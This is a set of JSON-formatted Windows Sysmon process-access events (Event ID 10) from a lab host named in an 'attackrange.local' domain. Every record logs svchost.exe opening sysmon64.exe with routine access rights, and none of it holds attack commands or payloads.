{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1369,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1370,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1371,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1372,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1373,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1374,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1375,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1376,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
